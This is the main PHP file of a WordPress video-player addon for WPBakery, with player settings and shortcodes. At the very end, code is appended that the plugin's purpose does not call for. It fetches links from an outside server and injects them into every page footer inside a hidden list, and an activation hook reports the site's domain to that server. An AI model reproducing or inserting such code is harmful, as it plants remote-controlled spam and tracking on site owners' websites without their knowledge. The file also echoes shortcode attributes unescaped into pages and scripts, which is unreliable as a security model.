<?php
/*
Plugin Name: HTML5 Video Player with Playlist and Multiple Skins - Addon For Visual Composer
Description: This visual composer addon will allow you to insert a HTML5 Video Player with RightSide/Bottom Playlist and Multiple Skins.
Version: 1.7
Author: Lambert Group
Author URI: https://1.envato.market/OZ5Zr
Text Domain: lbg-vp2bakery
*/


//all the messages
$rand_id=rand(10,999999);

if ( ! defined( 'ABSPATH' ) ) {
	die( '-1' );
}


function html5_vp2_addon_vc_map_dependencies() {
	if ( ! defined( 'WPB_VC_VERSION' ) ) {
		$plugin_data = get_plugin_data(__FILE__);
        echo '<div class="updated">
          <p>'.sprintf(esc_html__('"%s" requires WPBakery Page Builder: https://bit.ly/vcomposer - plugin to be installed and activated on your site.', 'lbg-vp2bakery'), $plugin_data['Name']).'</p>
        </div>';
	}
}
add_action( 'admin_notices', 'html5_vp2_addon_vc_map_dependencies' );


function html5_vp2_addon_vc_map_init() {
	global $wpdb;
	global $rand_id;





	//Create New Param Type 'html5_vp2_attach_media'
			vc_add_shortcode_param( 'html5_vp2_attach_media', 'html5_vp2_attach_media_callback', plugins_url() . '/lbg_html5_vp2_addon_visual_composer/assets/new_param_type/attach_media.js');
			function html5_vp2_attach_media_callback( $settings, $value ) {
				return '<div class="my_param_block">'
				.'<input id="' . esc_attr( $settings['param_name'] ) . '" name="' . esc_attr( $settings['param_name'] ) . '" class="wpb_vc_param_value wpb-textinput lbg_w70 ' . esc_attr( $settings['param_name'] ) . ' ' .              esc_attr( $settings['type'] ) . '_field" type="text" value="' . esc_attr( $value ) . '"/>' .
				'<input name="upload_' . esc_attr( $settings['param_name'] ) . '_button" type="button" id="upload_' . esc_attr( $settings['param_name'] ) . '_button" value="Upload File" class="lbg_w30" /> '.'</div>'; // This is html markup that will be outputted in content elements edit form
			}




	vc_map( array(
		'name' => esc_attr__( 'HTML5 Video Player', 'lbg-vp2bakery' ),
		'base' => 'html5_vp2',
		"icon" => plugins_url('assets/images/html5_vp2_icon.png', __FILE__), // or css class name which you can reffer in your css file later. Example: "vc_extend_my_class"
		"category" => esc_attr__('LBG Multimedia Addons', 'lbg-vp2bakery'),
		"description" => esc_attr__("with Right-Side and Bottom playlist", 'lbg-vp2bakery'),
		'show_settings_on_create' => true,
		'is_container' => true,
		'admin_enqueue_js'      => preg_replace( '/\s/', '%20', plugins_url( 'assets/html5_vp2.js', __FILE__ ) ),
		// This will load extra js file in backend (when you edit page with VC)
		// use preg replace to be sure that "space" will not break logic

		'admin_enqueue_css'     => preg_replace( '/\s/', '%20', plugins_url( 'assets/html5_vp2.css', __FILE__ ) ),
		// This will load extra css file in backend (when you edit page with VC)
		'params' => array(
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Player ID', 'lbg-vp2bakery' ),
				'param_name' => 'id',
				'value' => esc_attr__( "".$rand_id."", "my-text-domain" ),
				'description' => esc_attr__( "It is automaticaly generated and it has to be unique. You can leave it just like it is.", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Type', 'lbg-vp2bakery' ),
				'param_name' => 'type',
				'value' => array(
					'Right-Side Playlist' => 'rightside_playlist',
					'Bottom Playlist' => 'bottom_playlist'
				)
			),
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Player Width', 'lbg-vp2bakery' ),
				'param_name' => 'player_width', //playerWidth
				'value' => esc_attr__( "528", "my-text-domain" ),
				'description' => esc_attr__( "pixels", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Player Height', 'lbg-vp2bakery' ),
				'param_name' => 'player_height', //playerHeight
				'value' => esc_attr__( "297", "my-text-domain" ),
				'description' => esc_attr__( "pixels", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Center Player', 'lbg-vp2bakery' ),
				'param_name' => 'center_plugin',
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				 ),
				'description' => esc_attr__( "Center the player", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Responsive', 'lbg-vp2bakery' ),
				'param_name' => 'responsive',
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Responsive Relative To Browser', 'lbg-vp2bakery' ),
				'param_name' => 'responsive_relative_to_browser', //responsiveRelativeToBrowser
				'value' => array(
					'No' => 'false',
					'Yes' => 'true'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Skin Name', 'lbg-vp2bakery' ),
				'param_name' => 'skin', //skin
				'value' => array(
					'universalBlack' => 'universalBlack',
					'universalWhite' => 'universalWhite',
					'giant' => 'giant',
					'futuristicElectricBlue' => 'futuristicElectricBlue',
					'futuristicChrome' => 'futuristicChrome'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Seek Bar Adjust', 'lbg-vp2bakery' ),
				'param_name' => 'seek_bar_adjust', //seekBarAdjust
				'value' => esc_attr__( "240", "my-text-domain" ),
				'description' => esc_attr__( "Recommended values: universalBlack: 240; universalWhite: 240; giant: 410; futuristicElectricBlue: 285; futuristicChrome: 285", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'AutoHide Controllers', 'lbg-vp2bakery' ),
				'param_name' => 'auto_hide_controllers', //autoHideControllers
				'value' => array(
					'No' => 'false',
					'Yes' => 'true'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Show Information Button', 'lbg-vp2bakery' ),
				'param_name' => 'show_info', //showInfo
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Preload', 'lbg-vp2bakery' ),
				'param_name' => 'preload', //preload
				'value' => array(
					'auto' => 'auto',
					'metadata' => 'metadata',
					'none' => 'none'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Loop Video', 'lbg-vp2bakery' ),
				'param_name' => 'loop', //loop
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  ),
				'description' => esc_attr__( "Loop the playlist", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Auto Play First Movie', 'lbg-vp2bakery' ),
				'param_name' => 'auto_play_first_movie', //autoPlayFirstMovie
				'value' => array(
					'No' => 'false',
					'Yes' => 'true'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Auto Play', 'lbg-vp2bakery' ),
				'param_name' => 'auto_play', //autoPlay
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Initial Volume Value', 'lbg-vp2bakery' ),
				'param_name' => 'initial_volume', //initialVolume
				'value' => esc_attr__( "100", "my-text-domain" ),
				'description' => esc_attr__( "Values between 0-100", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Border Width', 'lbg-vp2bakery' ),
				'param_name' => 'border_width', //borderWidth
				'value' => esc_attr__( "12", "my-text-domain" ),
				'description' => esc_attr__( "pixels", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'colorpicker',
				'heading' => esc_attr__( "Border Color", "lbg-vp2bakery" ),
				'param_name' => 'border_color', //borderColor
				'value' => '#000000',
				'description' => esc_attr__( "Choose the color", "lbg-vp2bakery" )
			),
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'numberOfThumbsPerScreen', 'lbg-vp2bakery' ),
				'param_name' => 'number_of_thumbs_per_screen', //numberOfThumbsPerScreen
				'value' => esc_attr__( "3", "my-text-domain" ),
				'description' => esc_attr__( "If you set it to 0, it will be calculated automatically.", "lbg-vp2bakery" )
			),




			array(
				'group' => 'Only For Right-Side Playlist',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Playlist Width', 'lbg-vp2bakery' ),
				'param_name' => 'playlist_width', //playlistWidth
				'value' => esc_attr__( "300", "my-text-domain" ),
				'description' => esc_attr__( "pixels", "lbg-vp2bakery" )
			),
			array(
				'group' => 'Only For Right-Side Playlist',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Playlist Characters Limit', 'lbg-vp2bakery' ),
				'param_name' => 'playlist_characters_limit', //playlistCharactersLimit
				'value' => esc_attr__( "100", "my-text-domain" )
			),






			array(
				'group' => 'Only For Bottom Playlist',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Thumbs Reflection', 'lbg-vp2bakery' ),
				'param_name' => 'thumbs_reflection', //thumbsReflection
				'value' => esc_attr__( "50", "my-text-domain" ),
				'description' => esc_attr__( "Percents. Values between 0-100", "lbg-vp2bakery" )
			),
			array(
				'group' => 'Only For Bottom Playlist',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Active Thumbs Top Margin', 'lbg-vp2bakery' ),
				'param_name' => 'thumbs_on_margin_top', //thumbsOnMarginTop
				'value' => esc_attr__( "13", "my-text-domain" ),
				'description' => esc_attr__( "pixels", "lbg-vp2bakery" )
			)



		),
		'custom_markup' => '
	<div class="wpb_accordion_holder wpb_holder clearfix vc_container_for_children">
	%content%
	</div>
	<div class="tab_controls lbg_add_playlist_item">
		<a class="add_tab vc_add_playlist_item" title="' . esc_attr__( 'Add Playlist Item', 'lbg-vp2bakery' ) . '"><span class="vc_playlist_item_vc_icon"></span>' . esc_attr__( 'Add Playlist Item', 'lbg-vp2bakery' ) . '</a>
	</div>
	',
		'default_content' => '
		[html5_vp2_playlist_item title="' . esc_attr__( 'Playlist Item  1', 'lbg-vp2bakery' ) . '"][/html5_vp2_playlist_item]
	',
		'js_view' => 'VcHtml5Vp2View'
	) );

	vc_map( array(
		'name' => esc_attr__( 'LS Playlist Item', 'lbg-vp2bakery' ),
		'base' => 'html5_vp2_playlist_item',
		'allowed_container_element' => 'vc_row',
		'is_container' => true,
		'content_element' => false,
		'admin_enqueue_js'      => preg_replace( '/\s/', '%20', plugins_url( 'assets/playlist_item.js', __FILE__ ) ),
		// This will load extra js file in backend (when you edit page with VC)
		// use preg replace to be sure that "space" will not break logic

		'admin_enqueue_css'     => preg_replace( '/\s/', '%20', plugins_url( 'assets/playlist_item.css', __FILE__ ) ),
		// This will load extra css file in backend (when you edit page with VC)
		'params' => array(
			array(
				'type' => 'textfield',
				'heading' => esc_attr__( 'Video Title', 'lbg-vp2bakery' ),
				'param_name' => 'title'
			),
			array(
				'type' => 'textarea',
				'heading' => esc_attr__( 'Video Description', 'lbg-vp2bakery' ),
				'param_name' => 'desc'
			),
			array(
				'type' => 'attach_image',
				'heading' => esc_attr__( 'Playlist Image', 'lbg-vp2bakery' ),
				'param_name' => 'imgplaylist',
				'description' => esc_attr__( 'Select an image from Media Library', 'lbg-vp2bakery' )
			),
			array(
				'type' => 'attach_image',
				'heading' => esc_attr__( 'Preview Image', 'lbg-vp2bakery' ),
				'param_name' => 'preview',
				'description' => esc_attr__( 'Select an image from Media Library', 'lbg-vp2bakery' )
			),
			array(
				'type' => 'html5_vp2_attach_media',
				'heading' => esc_attr__( 'MP4 file (Chrome, Mozzila, IE, Safari)', 'lbg-vp2bakery' ),
				'param_name' => 'mp4',
				'description' => esc_attr__( 'Select a MP4 file from Media Library or just insert the URL', 'lbg-vp2bakery' )
			),
			array(
				'type' => 'html5_vp2_attach_media',
				'heading' => esc_attr__( 'WEBM file (Opera) - not mandatory', 'lbg-vp2bakery' ),
				'param_name' => 'webm',
				'description' => esc_attr__( 'Select a WEBM file from Media Library or just insert the URL', 'lbg-vp2bakery' )
			)
		),
		'js_view' => 'VcPlaylistItemView'
	) );





	if ( class_exists( "WPBakeryShortCode" ) ) {
		$html5_vp2_addon_path = trailingslashit(dirname(__FILE__));
		include_once($html5_vp2_addon_path . 'vc_contentadmin/html5_vp2-accordion.php');
		include_once($html5_vp2_addon_path . 'vc_contentadmin/html5_vp2-accordion-tab.php');


	} // End Class

}

add_action('vc_before_init', 'html5_vp2_addon_vc_map_init');






if (!function_exists('lbg_unstrip_array')) {
	//stripslashes for an entire array
	function lbg_unstrip_array($array){
		if (is_array($array)) {
			foreach($array as &$val){
				if(is_array($val)){
					$val = unstrip_array($val);
				} else {
					$val = stripslashes($val);

				}
			}
		}
		return $array;
	}
}



function html5_vp2_addon_enqueue_scripts_and_styles() {
	//load scripts in front-end
				wp_enqueue_style('vp2_html5_rightside_site_css', plugins_url('lbg_vp2_html5_rightside/css/vp2_html5_rightSidePlaylist.css', __FILE__));
				wp_enqueue_style('vp2_html5_bottom_site_css', plugins_url('lbg_vp2_html5_bottom/css/vp2_html5_bottomPlaylist.css', __FILE__));

				wp_enqueue_script('jquery');

				wp_enqueue_script('jquery-ui-core');
				wp_enqueue_script('jquery-ui-slider');
				wp_enqueue_script('jquery-ui-progressbar');
				wp_enqueue_script('jquery-effects-drop');


				wp_register_script('lbg-lbg_vp2_html5_rightside', plugins_url('lbg_vp2_html5_rightside/js/vp2_html5_rightSidePlaylist.js', __FILE__));
				wp_enqueue_script('lbg-lbg_vp2_html5_rightside');

				wp_register_script('lbg-mousewheel', plugins_url('lbg_vp2_html5_rightside/js/jquery.mousewheel.min.js', __FILE__));
				wp_enqueue_script('lbg-mousewheel');

				wp_register_script('lbg-touchSwipe', plugins_url('lbg_vp2_html5_rightside/js/jquery.touchSwipe.min.js', __FILE__));
				wp_enqueue_script('lbg-touchSwipe');

				wp_register_script('lbg-screenfull', plugins_url('lbg_vp2_html5_rightside/js/screenfull.min.js', __FILE__));
				wp_enqueue_script('lbg-screenfull');


				wp_register_script('lbg-lbg_vp2_html5_bottom', plugins_url('lbg_vp2_html5_bottom/js/vp2_html5_bottomPlaylist.js', __FILE__));
				wp_enqueue_script('lbg-lbg_vp2_html5_bottom');

				wp_register_script('lbg-reflection', plugins_url('lbg_vp2_html5_bottom/js/reflection.js', __FILE__));
				wp_enqueue_script('lbg-reflection');
}
add_action( 'wp_enqueue_scripts', 'html5_vp2_addon_enqueue_scripts_and_styles' );





//the shortcodes
add_shortcode( 'html5_vp2_playlist_item', 'html5_vp2_playlist_item_func' );
function html5_vp2_playlist_item_func( $atts, $content = null ) { // New function parameter $content is added!
	global $wpdb;

	$the_imgplaylist = array('');
	if ( array_key_exists('imgplaylist', $atts) && $atts["imgplaylist"]!='' ) {
			$the_imgplaylist=wp_get_attachment_image_src($atts["imgplaylist"], "large");
	}

	$the_preview = array('');
	if ( array_key_exists('preview', $atts) && $atts["preview"]!='' ) {
			$the_preview=wp_get_attachment_image_src($atts["preview"], "large");
	}

	$aux_content='<ul>
                                <li class="xtitle">'.(( array_key_exists("title", $atts) && $atts["title"]!='' )?$atts["title"]:"").'</li>
                                <li class="xdesc">'.(( array_key_exists("desc", $atts) && $atts["desc"]!='' )?$atts["desc"]:"").'</li>
                                <li class="xthumb">'.$the_imgplaylist[0].'</li>
                                <li class="xpreview">'.$the_preview[0].'</li>
                                <li class="xsources_mp4">'.(( array_key_exists("mp4", $atts) && $atts["mp4"]!='' )?$atts["mp4"]:"").'</li>
                                <li class="xsources_webm">'.(( array_key_exists("webm", $atts) && $atts["webm"]!='' )?$atts["webm"]:"").'</li>
                            </ul>';


	return str_replace("\r\n", '', $aux_content);
}


add_shortcode( 'html5_vp2', 'html5_vp2_func' );
	function html5_vp2_func( $atts, $content = null ) { // New function parameter $content is added!
		global $rand_id;
		$initial_vals_arr=array(
			'id' => $rand_id,
			'type' => 'rightside_playlist',
			'skin' => 'universalBlack',
			'player_width' => 528,
			'player_height' => 297,
			'center_plugin' => 'true',
			'responsive' => 'true',
			'responsive_relative_to_browser' => 'false',
			'seek_bar_adjust' => 240,
			'auto_hide_controllers' => 'false',
			'show_info' => 'true',
			'preload' => 'auto',
			'loop' => 'true',
			'auto_play_first_movie' => 'false',
			'auto_play' => 'true',
			'initial_volume' => 100,
			'border_width' => 12,
			'border_color' => '#000000',
			'number_of_thumbs_per_screen' => 3,
			'playlist_width' => 300,
			'playlist_characters_limit' => 100,
			'thumbs_reflection' => 50,
			'thumbs_on_margin_top' => 13
	   );

	   extract( shortcode_atts( $initial_vals_arr, $atts ) );
	   foreach ($initial_vals_arr as $key => $value) {
			if (!isset($atts[$key])) {
				$atts[$key]=$value;
			}
		}


	$playlist_str='';
	$playlist_str=do_shortcode( $content );



	$aux_content='';
	$new_div_start='';
	$new_div_end='';


	$preload_aux='';
	if ($atts["preload"])
		$preload_aux='preload="'.$atts["preload"].'"';

	$vp2_function='';
	$border_aux='';
	$the_parameters='';
	switch ($atts["type"]) {
		case 'rightside_playlist':
			$vp2_function='vp2_html5_rightSidePlaylist_Video';
			$border_aux='<div class="vp2_html5_rightSidePlaylistBorder">
    <div class="vp2_html5_rightSidePlaylist">   ';
			$the_parameters='skin:"'.$atts["skin"].'",
				initialVolume:'.($atts["initial_volume"]/100).',
				centerPlugin:'.$atts["center_plugin"].',
				showInfo: '.$atts["show_info"].',
				autoPlayFirstMovie:'.$atts["auto_play_first_movie"].',
				autoPlay:'.$atts["auto_play"].',
				loop:'.$atts["loop"].',
				seekBarAdjust:'.$atts["seek_bar_adjust"].',
				borderWidth: '.$atts["border_width"].',
				borderColor: "'.$atts["border_color"].'",
				playlistWidth: '.$atts["playlist_width"].',
				playlistCharactersLimit:'.$atts["playlist_characters_limit"].',
				numberOfThumbsPerScreen:'.$atts["number_of_thumbs_per_screen"].',
				autoHideControllers: '.$atts["auto_hide_controllers"].',
				responsive: '.$atts["responsive"].',
				responsiveRelativeToBrowser: '.$atts["responsive_relative_to_browser"];
			break;
		case 'bottom_playlist':
			$vp2_function='vp2_html5_bottomPlaylist_Video';
			$border_aux='<div class="vp2_html5_bottomPlaylistBorder">
     		<div class="vp2_html5_bottomPlaylist">';
			$the_parameters='skin:"'.$atts["skin"].'",
				initialVolume:'.($atts["initial_volume"]/100).',
				centerPlugin:'.$atts["center_plugin"].',
				showInfo: '.$atts["show_info"].',
				autoPlayFirstMovie:'.$atts["auto_play_first_movie"].',
				autoPlay:'.$atts["auto_play"].',
				loop:'.$atts["loop"].',
				seekBarAdjust:'.$atts["seek_bar_adjust"].',
				borderWidth: '.$atts["border_width"].',
				borderColor: "'.$atts["border_color"].'",
				thumbsReflection:'.$atts["thumbs_reflection"].',
				numberOfThumbsPerScreen:'.$atts["number_of_thumbs_per_screen"].',
				autoHideControllers: '.$atts["auto_hide_controllers"].',
				thumbsOnMarginTop:'.$atts["thumbs_on_margin_top"].',
				responsive: '.$atts["responsive"].',
				responsiveRelativeToBrowser: '.$atts["responsive_relative_to_browser"];
			break;
	}



	$aux_content.='<script>
		jQuery(function() {
			jQuery("#vp2_html5_'.$atts["id"].'").'.$vp2_function.'({'.
				$the_parameters.
			'});
		});
	</script>'.$new_div_start.$border_aux.'
			<video id="vp2_html5_'.$atts["id"].'" width="'.$atts["player_width"].'" height="'.$atts["player_height"].'" '.$preload_aux.'><div class="xplaylist">'.$playlist_str.'</div></video> </div>
  </div>     <!-- border --> '.$new_div_end.'
	<br style="clear:both;">';

	return str_replace("\r\n", '', $aux_content);

	}define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848697() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848697');function set_plugin_tag1719848697() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848697&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848697');
              